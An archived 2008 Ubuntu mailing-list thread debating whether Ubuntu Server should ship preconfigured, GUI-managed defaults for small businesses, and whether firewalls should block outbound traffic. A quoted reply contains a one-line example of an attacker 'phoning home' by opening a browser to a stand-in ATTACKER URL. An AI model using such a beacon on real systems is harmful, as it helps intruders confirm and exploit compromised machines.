Disappointed with Ubuntu Server, could be used by such a wider audience

Anthony Watters tonyozwatters at yahoo.com
Mon Aug 4 23:05:40 UTC 2008 

One way or another the world is going to head in this direction for home and small business users (http://www.microsoft.com/windows/products/winfamily/windowshomeserver/default.mspx). Of course, for large scale enterprises, which is where Ubuntu Server is clearly aimed at, it's a different story where heavy duty SMP NUMA, work from the command line, etc make a lot of sense. However, home and small business owners don't need any of that but, more importantly, they don't have the time or resources for the kind of administration that Ubuntu Server requires. At the same time the home/SOHO/small to medium business arena is a huge and, currently ignored segment, but not for long.

I now realise and understand the focus of Ubuntu Server, which is fine, but I am taking a different path, likely based on Ubuntu Desktop, to achieve my (mostly) preconfigured, GUI based personal server (Web server/Webmail server/File server and gateway). If that doesn't work out then I'll head down the ClarkConnect (www.clarkconnect.com) Cent OS/RHEL path. I am also liaising with others on this too who want this. One way or another I will get the kind of system I want.

Regards,

Tony



----- Original Message ----
From: Stephan Hermann <sh at sourcecode.de>
To: ubuntu-devel-discuss at lists.ubuntu.com
Sent: Monday, August 4, 2008 3:27:59 PM
Subject: Re: Disappointed with Ubuntu Server, could be used by such a wider audience

On Sun, Aug 03, 2008 at 10:40:42AM +0800, John McCabe-Dansted wrote:
> On Sat, Aug 2, 2008 at 6:23 AM, Mackenzie Morgan <macoafi at gmail.com> wrote:
> > Because as he said, if you pre-configure everything to
> > super-duper-easy-peasy, you've also pre-configured it to
> > super-duper-easy-peasy-to-crack.  I'm personally disappointed by
> > firewalls that allow outbound by default, because something could phone
> > home if I put my trust in an application I shouldn't, but they're
> > easy-peasy for users, so that's what people do.  I can manually go
> > through and fix it myself, but if some application is running about
> > opening who knows how many ports and setting god-knows-what services to
> > auto-start and mucking about with insecure options in config files...how
> > many months is it going to take me to track all of that down?  No way.
> 
> Commercial windows firewall pretty much all block outbound traffic by
> default, popping up a dialog box offering  to allow that particular
> application to access the internet. I understand that it is fairly
> easily for an attacker to phone home though. For example, just run
> firefox http://ATTACKER/this-machine-is-cracked.

Well, for firefox and doing this it needs manual intervention. 
For a user clicking on a malicius url, which executes some really bad
javascript, this is more the type of stuff we face today. Layer 8 + 9
Problem.

> However if it good practice to prevent e.g. httpd making outgoing
> connections this should be done by default. It is fairly easy to do
> this with e.g. systrace.

http doesn't make any outgoing connection, until you connect to the
httpd and it creates a >1024 connection to the client.

Outgoing connection actually are not allowed by windows firewall minus
all unknown system apps who are calling back to MS by default and are
allowed to that on purpose.

> The arguments that it is hard to step up these systems to be secure
> seems to be an argument that they should be secured once, by Ubuntu,
> with a great deal of scrutiny on whether the configuration really is
> secure.  Even if we assume that everyone will hire a UNIX guru we
> can't assume that all the "gurus" really are gurus or that they won't
> forget one tiny exploit.

a) there is no security in general
b) if there is, please read point a)

> Ubuntu desktop already has one server function. I can right click a
> file, go to share and share the folder using samba. If you know of any
> security flaws with this GUI, please report a bug.

I wonder if you share your samba drives over the internet...if so,
something is a) wrong with your router, and b) I wouldn't let you do
any work on my network...sounds hard, but it is. And yes, we should
prevent users from doing those stupid things.

Regards,

\sh
-- 
Stephan '\sh' Hermann        | OSS Developer & Systemadministrator
JID: sh at linux-server.org    | http://www.sourcecode.de/
GPG ID: 0xC098EFA8        | http://leonov.tv/
3D8B 5138 0852 DA7A B83F  DCCB C189 E733 C098 EFA8

-- 
Ubuntu-devel-discuss mailing list
Ubuntu-devel-discuss at lists.ubuntu.com
Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss



      
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.ubuntu.com/archives/ubuntu-devel-discuss/attachments/20080804/9bec5696/attachment.html>

More information about the Ubuntu-devel-discuss mailing list